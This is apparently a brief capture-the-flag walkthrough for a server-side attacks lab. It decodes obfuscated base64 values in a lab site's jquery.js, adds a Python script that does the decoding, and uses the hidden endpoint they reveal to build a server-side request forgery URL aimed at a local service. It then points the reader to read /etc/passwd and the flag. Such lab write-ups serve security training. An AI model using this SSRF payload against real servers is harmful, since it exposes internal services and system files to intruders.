Server Side Attacks

Skills Assessment

tplmap.py can be used to get an os-shell easily, but not in this case.

Go to view-source:http://104.248.160.230:30947/static/jquery.js

Using the Decodify tool, decode the base64 values of var x, y and z:

./dcode Ly86cHR0aA== -> http://

./dcode dHNvaC5ub2l0YWNvbC53b2RuaXc= -> window.location.host

./dcode dHh0LmVnYXNzZW0vMDgwODoxLjAuMC43MjEvLzpwdHRoPXQzM2w/M000M2wxRnQ0aFR0M0cv -> /G3tTh4tF1l34M3?l33t=http://127.0.0.1:8080/message.txt
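
The three decodes above, reproduced without Decodify as an added example (not part of the original walkthrough): each value is base64 of a reversed string, so the script decodes it and keeps whichever orientation looks readable. The function names and the MARKERS heuristic are assumptions made for this example.

```python
import base64
import binascii

# Values of x, y and z exactly as listed in the walkthrough above.
ENCODED = [
    "Ly86cHR0aA==",
    "dHNvaC5ub2l0YWNvbC53b2RuaXc=",
    "dHh0LmVnYXNzZW0vMDgwODoxLjAuMC43MjEvLzpwdHRoPXQzM2w/M000M2wxRnQ0aFR0M0cv",
]

# Assumed heuristic: substrings that suggest the text is in reading order.
MARKERS = ("http://", "https://", "window.", "document.")


def decode_value(value):
    """Return (decoded, decoded_reversed), or None if value is not base64 text."""
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text, text[::-1]


def best_guess(value):
    """Pick the orientation (as decoded or reversed) that matches more markers."""
    decoded = decode_value(value)
    if decoded is None:
        return None
    plain, flipped = decoded

    def score(s):
        return sum(marker in s for marker in MARKERS)

    return flipped if score(flipped) > score(plain) else plain


if __name__ == "__main__":
    for name, value in zip("xyz", ENCODED):
        plain, _ = decode_value(value)
        print(f"{name}: raw={plain!r} readable={best_guess(value)!r}")
```
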

Go to http://165.232.98.156:31779/G3tTh4tF1l34M3?l33t=http://127.0.0.1:8080/message.txt

Try to read /etc/passwd

Read the flag
